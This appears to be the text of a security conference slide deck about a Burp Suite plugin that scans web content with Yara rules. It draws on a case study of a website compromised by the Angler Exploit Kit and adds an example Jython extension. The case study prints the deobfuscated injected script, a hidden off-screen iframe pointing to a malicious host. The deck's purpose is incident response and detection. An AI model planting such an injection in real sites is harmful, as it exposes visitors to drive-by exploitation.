Burpsuite / Yara Integration
Ian Duffy
Polito, Inc.
@politoinc
Introduction
• Who am I?
• About Burpsuite and Yara
• Case study: A compromised website
• Plugin development
• Future Roadmap
• Questions
Who am I?
• Former USAF network defender
• Current cybersecurity consultant for Polito
• Background in penetration testing (traditional and web application) as well as malware analysis
• Current duties involve malware analysis and threat hunting
Burpsuite
• Burpsuite is a MITM proxy tool for viewing, intercepting, modifying, and transmitting HTTP(S) requests and responses.
• Allows the user to view all web content down to the byte level, to include static pages, JavaScript, JSON, WebSockets, and much more.
• Includes several tools for assessing the security of web applications
BurpSuite
Yara
• Yara is a sophisticated pattern matching tool
• Specifies a language for describing strings, binary / hexadecimal data, file offset information, and file structure information in order to write pattern matching rules
• Rules can be run against one or many files or data streams in order to find matches
Yara Rules Example
Case Study
• Client contacts Polito and says that their IT department is getting phone calls stating that their website is causing “FireEye Alerts” and is likely compromised
• Polito is asked to investigate and determine:
– Whether the site is actually compromised
– If so, the scope, scale, and impact of the compromise
Case Study
• We request a tarball of the current webroot folder and a dump of any backend CMS databases
• In the meantime we begin spidering the website using Burpsuite…
Case Study
Highly obfuscated JavaScript – interesting…
Case Study
• The obfuscated JavaScript is consistent with the Angler Exploit Kit, which matches the alerts reported by our client’s IT department
• After deobfuscation of the JavaScript we see the following:
document.write('<style>.ddidfodevxgsz{position:absolute;top:-907px;width:300px;height:300px;}</style><div class="ddidfodevxgsz"><iframe src="http://ryonfmza.buildera.cf/consent/knife-lodge-19720974" width="250" height="250"></iframe></div>');
Case Study
• Problems:
– How do we identify whether this EK landing page / malicious JavaScript has been inserted into any other pages on the site?
– How do we identify whether the attackers have left themselves a back door?
Case Study
• Possible Solutions
– Wait for three days before the client can get a tarball of their website uploaded to our SFTP server
– Manually search through online web content
– Write something to automate our searching
Writing Burpsuite Plugins
• Burpsuite supports plugins in Java, Ruby, and Python
– Ruby requires JRuby
– Python requires Jython
• We decided to use Python to develop our Yara integration for expedience
The Plugin…
• Burpsuite specifies several interfaces for performing various tasks
• Depending on what functionality we are trying to implement, we must implement one or more of those interfaces
• The interfaces specify methods that must be implemented in order to handle events from the Burpsuite UI
The Plugin…
• Each of the interfaces requires specific methods to be implemented
– IBurpExtender requires a method named registerExtenderCallbacks
– ITab requires methods named getTabCaption and getUIComponent
• Documentation for the interfaces is available at:
– https://portswigger.net/burp/extender/api/index.html
The Plugin…
• Our basic use case was as follows:
– Burpsuite user spiders a website to retrieve as much of the content as possible
– User right-clicks on the website in the Burp UI and selects “Scan with Yara”
– Yara is used to scan the content of the web requests and responses
– Results are displayed to the user in a Tab
Jython
• Jython is a hybrid between Java and Python
• You can “import” Java classes, instantiate Java objects, and call their methods via Python code:
Jython
• Java objects are instantiated by calling a constructor method with the same name as the class
– No “new” keyword like in Java
– Parameters to the constructors are the same
• Once instantiated, class objects can be used just as with Java
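As an added example of how the interfaces and Jython pieces above fit together (this is not the PolitoInc/Yara-Scanner plugin's own code): IBurpExtender registers the extension, IContextMenuFactory supplies the “Scan with Yara” right-click item, and ITab shows the report. The yara binary on PATH, the rules.yar path, and the stub classes that stand in for Burp's interfaces outside Burp are assumptions.

```python
# Added example, not the PolitoInc plugin: Jython Burp extension around a pure-Python scan core.
import os, subprocess, tempfile
try:   # burp/javax classes only exist inside Burp's Jython; stubs let the core import under CPython
    from burp import IBurpExtender, IContextMenuFactory, ITab
    from javax.swing import JMenuItem, JScrollPane, JTextArea
    from java.util import ArrayList
except ImportError:
    class IBurpExtender(object): pass
    class IContextMenuFactory(object): pass
    class ITab(object): pass

def yara_cli_matcher(rules_path):
    """matcher(data) -> [rule names]. Shells out to the yara CLI (assumed on PATH) because
    Jython cannot load yara-python's C extension; each body is scanned from a temp file."""
    def match(data):
        tmp = tempfile.NamedTemporaryFile(delete=False)
        try:
            tmp.write(data); tmp.close()
            out = subprocess.Popen(["yara", rules_path, tmp.name], stdout=subprocess.PIPE).communicate()[0]
        finally:
            os.unlink(tmp.name)
        return [ln.split(" ", 1)[0] for ln in out.decode("utf-8", "replace").splitlines() if ln.strip()]
    return match

def scan_messages(matcher, messages):
    """messages: iterable of (url, body bytes). Returns [(url, [rule names])] for bodies with hits."""
    return [(url, hits) for url, hits in ((u, matcher(b)) for u, b in messages) if hits]

def format_report(hits):
    return "\n".join("%s: %s" % (u, ", ".join(r)) for u, r in hits) or "No matches"

class BurpExtender(IBurpExtender, IContextMenuFactory, ITab):
    def registerExtenderCallbacks(self, callbacks):          # IBurpExtender
        self._helpers = callbacks.getHelpers()
        self._matcher = yara_cli_matcher("rules.yar")        # hypothetical rules file
        self._output = JTextArea()                           # Swing object: no "new" keyword in Jython
        callbacks.setExtensionName("Yara scan example")
        callbacks.registerContextMenuFactory(self)
        callbacks.addSuiteTab(self)
    def createMenuItems(self, invocation):                   # IContextMenuFactory
        items = ArrayList()
        items.add(JMenuItem("Scan with Yara", actionPerformed=lambda e: self._scan(invocation)))
        return items
    def _scan(self, invocation):                             # scan bodies of the selected responses
        msgs = []
        for m in invocation.getSelectedMessages() or []:
            resp = m.getResponse()
            if resp is not None:
                body = resp[self._helpers.analyzeResponse(resp).getBodyOffset():].tostring()
                msgs.append((str(self._helpers.analyzeRequest(m).getUrl()), body))
        self._output.setText(format_report(scan_messages(self._matcher, msgs)))
    def getTabCaption(self): return "Yara"                   # ITab
    def getUIComponent(self): return JScrollPane(self._output)
```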
Demonstration
Live demo time – this always works!
Future Roadmap
• Things that we are looking into:
– Live Yara scanning as you surf
– Persistent configuration settings
– Multiple rules files
• Your thoughts and feature requests are most welcome!
Grab a Copy
• Plugin is available on our Github site:
• https://github.com/PolitoInc/Yara-Scanner
• Please send any feedback to [email protected]
Questions?
Ian Duffy
Polito, Inc.
@politoinc
www.politoinc.com
Thank You!